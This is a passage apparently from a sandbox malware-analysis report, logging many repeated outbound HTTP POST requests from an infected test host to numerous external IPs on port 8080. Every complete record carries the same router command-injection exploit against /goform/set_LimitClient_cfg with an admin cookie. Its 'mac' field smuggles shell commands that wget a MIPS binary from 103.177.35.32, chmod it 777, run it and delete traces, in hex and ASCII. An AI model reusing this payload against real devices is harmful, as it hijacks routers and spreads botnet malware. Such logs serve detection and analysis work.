                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.2349760116.152.166.2278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401094913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.23593829.157.231.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401145935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.234217299.62.21.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401160002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.2340054100.1.79.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401173115 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.235957220.150.148.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401180983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.2333134121.6.55.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401207924 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.235499095.197.230.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401216030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.235576837.107.218.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401216030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.2343942123.216.102.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401222944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.2359904132.41.46.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401245117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.2338828217.224.140.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401259899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.2332882143.118.132.918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401274920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.2337472108.92.44.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401468039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.2351898198.191.17.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401515961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.2335228159.161.11.1618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401520014 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.234726474.29.93.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401598930 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.235773857.23.253.1588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401638031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.235860434.184.97.1308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401669025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.2339302146.54.235.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401674986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.235161417.124.197.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401695967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.23353428.189.59.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401712894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.2349356108.17.194.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401722908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.2359110182.74.70.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401751041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
